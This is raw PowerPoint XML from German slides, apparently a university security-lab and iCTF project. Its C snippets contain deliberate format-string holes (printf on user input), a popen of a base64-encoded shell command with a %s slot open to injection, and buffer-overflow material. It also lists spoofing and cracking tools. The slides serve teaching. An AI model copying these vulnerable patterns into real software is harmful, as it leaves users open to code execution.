              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>("Y2F0IC4uL3J3L2luZm8vRmFocnpldWdudW1tZXJuLmNzdiB8IGdyZXAgJXMgfCBoZWFkIC0xIHwgYXdrIC1GICc7JyAne3ByaW50ICQyfSc=", </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>) 108, </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="1100" dirty="0" smtClean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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>ciFound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>== 0){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>    FILE *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>, "r");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char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>[256];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while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>) != 0) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>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pclose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0" err="1"/>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t> 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1100" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Gekrümmte Verbindung 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1774479" y="1847533"/>
            <a:ext cx="2299580" cy="1339913"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 771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838669" y="4046899"/>
            <a:ext cx="1747319" cy="2444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493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Services – Schwachstellen – Format String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731764" y="1263965"/>
            <a:ext cx="2857650" cy="4740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14672" y="2931096"/>
            <a:ext cx="3376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kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>sep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (i = 0; i &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>; i++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>      __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>__ volatile (  "push  %%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>                      :</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="0" dirty="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>                      : "a"(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>sep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>[i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>])</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="0" dirty="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="0" dirty="0">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>                  );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="0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842209" y="2931097"/>
            <a:ext cx="349440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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>*a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>encryptedData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>[j];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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>(a);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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> (i = 0; i &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>; i++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>      __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>__ volatile (  "push  %%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>                      :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>                      : "a"(a[i])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>                      :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>                  );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>    }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47938" y="6006384"/>
            <a:ext cx="133085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kern="0" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" kern="0" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" kern="0" dirty="0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1050986" y="1476388"/>
            <a:ext cx="360000" cy="36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9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  <a:alpha val="9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9" idx="4"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1225362" y="1836388"/>
            <a:ext cx="5624" cy="1094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2" idx="2"/>
            <a:endCxn id="7" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4396273" y="2769282"/>
            <a:ext cx="1" cy="438628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7" idx="0"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4396273" y="737956"/>
            <a:ext cx="1" cy="438628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13368" y="219638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j=0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4112962" y="51392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j++</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Gerade Verbindung mit Pfeil 33"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1213368" y="4962423"/>
            <a:ext cx="7125" cy="1043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213367" y="19124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r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>[1];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33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Inhalte:</a:t>
            </a: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Website (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Flask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Anleitungen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Demos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Praktikaaufgaben</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/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Diverse Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>DNSSPOOF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>ARPSPOOF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Sslstrip</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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SecurityWorkBench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Debian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494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95200" y="734400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43</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE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/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3123447" y="988400"/>
          <a:ext cx="3539908" cy="545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Acrobat Document" r:id="rId3" imgW="3781226" imgH="5829062" progId="AcroExch.Document.DC">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="3781226" imgH="58290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3447" y="988400"/>
                        <a:ext cx="3539908" cy="545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6805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44</a:t>
            </a:fld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2676105" y="814814"/>
          <a:ext cx="3679431" cy="567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Acrobat Document" r:id="rId3" imgW="3781226" imgH="5829062" progId="AcroExch.Document.DC">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="3781226" imgH="58290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6105" y="814814"/>
                        <a:ext cx="3679431" cy="567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302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/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2871504" y="798385"/>
          <a:ext cx="3781425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Acrobat Document" r:id="rId3" imgW="3781226" imgH="5829062" progId="AcroExch.Document.DC">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="3781226" imgH="58290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1504" y="798385"/>
                        <a:ext cx="3781425" cy="58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042780" y="1720158"/>
            <a:ext cx="37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 Proxy-Support!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42780" y="2676360"/>
            <a:ext cx="37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Lösung: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proxychains-ng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0165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567066" y="3164905"/>
            <a:ext cx="186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Demo-Time!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601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/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1029657" y="1323346"/>
          <a:ext cx="7952817" cy="515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Acrobat Document" r:id="rId3" imgW="5829013" imgH="3781139" progId="AcroExch.Document.DC">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="5829013" imgH="37811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9657" y="1323346"/>
                        <a:ext cx="7952817" cy="515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4450" y="658267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Dominik Schlecht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5724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Roxychains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&amp; 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Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Overflow 			Maximilian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Wenzl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3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Verschlüsselung der Bayerischen Übersetzungsdatei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 err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OpenSSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> AES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>encryption</a:t>
            </a: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Zum Entschlüsseln:</a:t>
            </a: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Erstellung einer Textdatei mit Zufallsnamen</a:t>
            </a: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Herauslesen der benötigten Zeile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360000" lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Löschen der Textdatei</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360000" lvl="1" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1800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Zusammenfassung der Service-Beschreibungen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iCTF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37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Das Image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600" b="0" i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ker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Demos in das gemeinsame genutzte Debian Image integriert </a:t>
            </a:r>
          </a:p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Das Image läuft in einer virtualisierten Umgebung</a:t>
            </a:r>
          </a:p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Benötigte Tools sind auf dem Image vorinstalliert</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" b="1" i="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="005A9B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="360000" lvl="1" indent="360000" algn="l">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="360000" lvl="1" indent="360000" algn="l">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crunch</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="360000" lvl="1" indent="360000" algn="l">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="360000" lvl="1" indent="360000"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usw.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" i="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="005A9B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abgespeckte Version der Komplettdokumentation als HTML Version für die direkte Arbeit mit dem Image</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="005A9B"/>
              </a:solidFill>
            </a:endParaRPr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834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Eine der ältesten Sicherheitslücken die es gibt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Immer noch Bestandteil der meisten Würmer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Ein </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Overflow kommt zustande, wenn mehr Speicher als vorgesehen benutzt wird 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Beispiel: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
